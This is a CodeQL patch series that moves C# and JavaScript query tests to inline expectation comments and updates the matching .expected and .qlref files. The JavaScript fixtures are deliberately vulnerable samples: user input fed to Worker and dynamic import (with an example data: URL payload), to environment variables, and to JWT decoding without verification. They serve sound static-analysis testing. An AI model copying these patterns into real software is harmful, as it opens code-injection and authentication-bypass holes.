// BAD // $ Alert c6x.Add(12); - ISet c6y = new HashSet(); // BAD + ISet c6y = new HashSet(); // BAD // $ Alert c6y.Add(1); } @@ -264,7 +264,7 @@ void TestDynamicAccess() t.InvokeMember("Add", System.Reflection.BindingFlags.InvokeMethod, null, c7c, new Object[] { 1 }); } - IList c8a = new List(); // BAD: no attribute + IList c8a = new List(); // BAD: no attribute // $ Alert [Obsolete()] IList c8b = new List(); // GOOD: has attribute diff --git a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref index ddd3e9fb1cb8..9d2057a3d375 100644 --- a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref +++ b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/WriteOnlyContainer.ql +query: Likely Bugs/Collections/WriteOnlyContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs index 1b550cacf8ac..a4541e2ba24d 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs @@ -3,9 +3,9 @@ class Test static void Main(string[] args) { // BAD - c3.Equals(c4); - c2.Equals(c3); - c7.Equals(c6); + c3.Equals(c4); // $ Alert + c2.Equals(c3); // $ Alert + c7.Equals(c6); // $ Alert // GOOD c1.Equals(c2); diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref index 96eae4e2eac5..91b47c6ddd94 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref 
+++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/IncomparableEquals.ql \ No newline at end of file +query: Likely Bugs/IncomparableEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs index f717fe662c6b..756b667a055d 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs @@ -14,9 +14,9 @@ void test() result = (object)unknownValue = someValue; // BAD: Explicit cast - result = (object)unknownValue == (object)someValue; + result = (object)unknownValue == (object)someValue; // $ Alert // BAD: Type information known - result = this == (object)this; + result = this == (object)this; // $ Alert } } diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref index 6f834d6d6548..e47228487204 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/ObjectComparison.ql \ No newline at end of file +query: Likely Bugs/ObjectComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref b/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref index 4787fa5d4b2e..1255164237c6 100644 --- a/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref +++ b/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref 
@@ -1 +1 @@ -utils/modeleditor/ApplicationModeEndpoints.ql \ No newline at end of file +query: utils/modeleditor/ApplicationModeEndpoints.ql diff --git a/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref b/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref index 5ae87455edd6..ec216021687b 100644 --- a/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref +++ b/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref @@ -1 +1 @@ -utils/modeleditor/FrameworkModeEndpoints.ql \ No newline at end of file +query: utils/modeleditor/FrameworkModeEndpoints.ql From d75113de93d0a79c515b27a6f122dc39fc480661 Mon Sep 17 00:00:00 2001 
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:33 +0200 Subject: [PATCH 04/15] JS --- .../CWE-094-dataURL/CodeInjection.expected | 10 ++--- .../CWE-094-dataURL/CodeInjection.qlref | 3 +- .../Security/CWE-094-dataURL/test.js | 12 +++--- .../EnvValueAndKeyInjection.expected | 6 +-- .../EnvValueAndKeyInjection.qlref | 3 +- .../CWE-099/EnvValueAndKeyInjection/test.js | 6 +-- .../EnvValueInjection.expected | 8 ++-- .../EnvValueInjection/EnvValueInjection.qlref | 3 +- .../CWE-099/EnvValueInjection/test.js | 8 ++-- .../CWE-347/localsource/JsonWebToken.js | 10 ++--- ...JwtWithoutVerificationLocalSource.expected | 14 +++---- ...odeJwtWithoutVerificationLocalSource.qlref | 3 +- .../Security/CWE-347/localsource/jose.js | 4 +- .../Security/CWE-347/localsource/jwtDecode.js | 4 +- .../Security/CWE-347/localsource/jwtSimple.js | 4 +- .../CWE-347/remotesource/JsonWebToken.js | 10 ++--- .../decodeJwtWithoutVerification.expected | 14 +++---- .../decodeJwtWithoutVerification.qlref | 3 +- .../Security/CWE-347/remotesource/jose.js | 4 +- .../CWE-347/remotesource/jwtDecode.js | 4 +- .../CWE-347/remotesource/jwtSimple.js | 4 +- .../Security/CWE-918/SSRF.expected | 42 +++++++++---------- .../experimental/Security/CWE-918/SSRF.qlref | 3 +- .../Security/CWE-918/check-domain.js | 6 +-- .../Security/CWE-918/check-middleware.js | 2 +- .../Security/CWE-918/check-path.js | 10 ++--- .../Security/CWE-918/check-regex.js | 12 +++--- .../Security/CWE-918/check-validator.js | 14 +++---- .../MultipleArgumentsToSetConstructor.qlref | 3 +- .../MultipleArgumentsToSetConstructorBad.js | 2 +- .../MultipleArgumentsToSetConstructor/tst.js | 2 +- .../UnpromotedRouteHandlerCandidate.qlref | 3 +- .../UnpromotedRouteSetupCandidate.qlref | 3 +- .../frameworks/HTTP-heuristics/src/hapi.js | 2 +- .../frameworks/HTTP-heuristics/src/nodejs.js | 6 +-- .../HTTP-heuristics/src/route-objects.js | 14 +++---- .../frameworks/HTTP-heuristics/src/tst.js | 42 +++++++++---------- .../frameworks/Templating/CodeInjection.qlref 
| 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../Diagnostics/ExtractionErrors.qlref | 2 +- .../ExternalDependencies.qlref | 2 +- .../Metrics/FLinesOfCode/FLinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../query-tests/definitions/definitions.qlref | 2 +- .../filters/ClassifyFiles/ClassifyFiles.qlref | 2 +- 47 files changed, 166 insertions(+), 157 deletions(-) diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected index 0385389e73c1..c4f42ba87154 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected @@ -1,3 +1,8 @@ +#select +| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | +| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | edges | test.js:5:11:5:17 | payload | test.js:6:30:6:36 | payload | provenance | | | test.js:5:11:5:17 | payload | test.js:9:26:9:32 | payload | provenance | | 
@@ -33,8 +38,3 @@ nodes | test.js:19:18:19:24 | payload | semmle.label | payload | | test.js:19:18:19:30 | payload + sth | semmle.label | payload + sth | subpaths -#select -| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | -| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref index 3caf7ab7b43b..9ed18359d203 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-094-dataURL/CodeInjection.ql \ No newline at end of file +query: experimental/Security/CWE-094-dataURL/CodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js b/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js index a5a2e76fa3c8..0c1a654d7021 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js 
@@ -2,21 +2,21 @@ const { Worker } = require('node:worker_threads'); var app = require('express')(); app.post('/path', async function (req, res) { - const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' + const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' // $ Source let payloadURL = new URL(payload + sth) // NOT OK - new Worker(payloadURL); + new Worker(payloadURL); // $ Alert payloadURL = new URL(payload + sth) // NOT OK - new Worker(payloadURL); + new Worker(payloadURL); // $ Alert payloadURL = new URL(sth + payload) // OK new Worker(payloadURL); }); app.post('/path2', async function (req, res) { - const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' - await import(payload) // NOT OK - await import(payload + sth) // NOT OK + const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' // $ Source + await import(payload) // NOT OK // $ Alert + await import(payload + sth) // NOT OK // $ Alert await import(sth + payload) // OK }); diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected index d54685c97bef..bbf737831d6d 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected 
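Review bot: In the `/path` handler of CWE-094-dataURL/test.js the new `// $ Alert` expectations sit on `new Worker(payloadURL);`, while the older `// NOT OK` markers stay one line up on `new URL(payload + sth)`, so the prose marker and the checked expectation point at different lines. CodeInjection.expected in the same patch reports the sinks at test.js:7 and test.js:10, which are the `new Worker` lines, so the prose marker is the one to move: `new Worker(payloadURL); // NOT OK // $ Alert`. The safe case `new URL(sth + payload) // OK` would also read better with its reason spelled out, for example `// OK - payload is not the start of the URL, so it cannot select the data: scheme`; that rationale is inferred from the comment on the `payload` line and should be confirmed against the query.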
@@ -1,3 +1,6 @@ +#select +| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | +| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | edges | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:11:5:18 | EnvValue | provenance | | | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:21:5:26 | EnvKey | provenance | | @@ -27,6 +30,3 @@ nodes | test.js:15:15:15:20 | EnvKey | semmle.label | EnvKey | | test.js:16:26:16:33 | EnvValue | semmle.label | EnvValue | subpaths -#select -| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | -| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref index fde9a286e5a8..dbd1332e35ae 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-099/EnvValueAndKeyInjection.ql \ No newline at end of file +query: experimental/Security/CWE-099/EnvValueAndKeyInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js index a12377c9cec9..f531447f4364 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js @@ -2,9 +2,9 @@ const http = require('node:http'); http.createServer((req, res) => { - const { EnvValue, EnvKey } = req.body; - process.env[EnvKey] = EnvValue; // NOT OK - process.env[EnvKey] = EnvValue; // NOT OK + const { EnvValue, EnvKey } = req.body; // $ Source + process.env[EnvKey] = EnvValue; // NOT OK // $ Alert + process.env[EnvKey] = EnvValue; // NOT OK // $ Alert res.end('env has been injected!'); }); diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected index 5ba1884017f6..ae8779ded9e7 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected 
@@ -1,3 +1,7 @@ +#select +| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | edges | test.js:4:9:4:20 | { EnvValue } | test.js:4:11:4:18 | EnvValue | provenance | | | test.js:4:11:4:18 | EnvValue | test.js:5:35:5:42 | EnvValue | provenance | | @@ -12,7 +16,3 @@ nodes | test.js:6:23:6:30 | EnvValue | semmle.label | EnvValue | | test.js:7:22:7:29 | EnvValue | semmle.label | EnvValue | subpaths -#select -| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref index e03328beda4f..9fc1b79b8107 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE-099/EnvValueInjection.ql \ No newline at end of file +query: experimental/Security/CWE-099/EnvValueInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js index cb28f01b88b0..24eee6278b80 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js @@ -1,10 +1,10 @@ const http = require('node:http'); http.createServer((req, res) => { - const { EnvValue } = req.body; - process.env["A_Critical_Env"] = EnvValue; // NOT OK - process.env[AKey] = EnvValue; // NOT OK - process.env.AKey = EnvValue; // NOT OK + const { EnvValue } = req.body; // $ Source + process.env["A_Critical_Env"] = EnvValue; // NOT OK // $ Alert + process.env[AKey] = EnvValue; // NOT OK // $ Alert + process.env.AKey = EnvValue; // NOT OK // $ Alert res.end('env has been injected!'); }); diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js index 022b0bda11f4..a10382235c07 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js 
@@ -10,18 +10,18 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink })(); (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK - jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink + jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK // $ Sink })(); (function () { diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected index 09db119d0786..ba75c463f9be 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected 
@@ -1,3 +1,10 @@ +#select +| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | +| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | +| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | +| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | edges | JsonWebToken.js:13:11:13:19 | UserToken | JsonWebToken.js:16:28:16:36 | UserToken | provenance | | | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:11:13:19 | UserToken | provenance | | 
@@ -73,10 +80,3 @@ nodes | jwtSimple.js:31:23:31:31 | UserToken | semmle.label | UserToken | | jwtSimple.js:32:23:32:31 | UserToken | semmle.label | UserToken | subpaths -#select -| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | -| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | -| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | -| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref index ee8effa049c5..36743e927596 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE-347/decodeJwtWithoutVerificationLocalSource.ql \ No newline at end of file +query: experimental/Security/CWE-347/decodeJwtWithoutVerificationLocalSource.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js index 625618e194dc..4831b56d0ff2 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js @@ -9,10 +9,10 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // no signature verification - jose.decodeJwt(UserToken) // NOT OK + jose.decodeJwt(UserToken) // NOT OK // $ Sink })(); (async function () { diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js index f3d4a40314c7..45ac500770a4 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js @@ -10,9 +10,9 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // jwt-decode // no signature verification - jwt_decode(UserToken) // NOT OK + jwt_decode(UserToken) // NOT OK // $ Sink })(); \ No newline at end of file diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js index 73b79d86d758..894a23aca788 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js 
@@ -10,10 +10,10 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // BAD: no signature verification - jwt_simple.decode(UserToken, getSecret(), true); // NOT OK + jwt_simple.decode(UserToken, getSecret(), true); // NOT OK // $ Sink })(); (function () { diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js index 0e39e95b632d..a562e4add805 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js @@ -7,18 +7,18 @@ function getSecret() { return "A Safe generated random key" } app.get('/jwtJsonwebtoken1', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink }) app.get('/jwtJsonwebtoken2', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK - jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink + jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK // $ Sink }) app.get('/jwtJsonwebtoken3', (req, res) => { diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected index 364fbd76b002..54fa92b1b136 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected 
+++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected @@ -1,3 +1,10 @@ +#select +| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | +| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | +| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | +| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | edges | JsonWebToken.js:10:11:10:19 | UserToken | JsonWebToken.js:13:28:13:36 | UserToken | provenance | | | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:11:10:19 | UserToken | provenance | | 
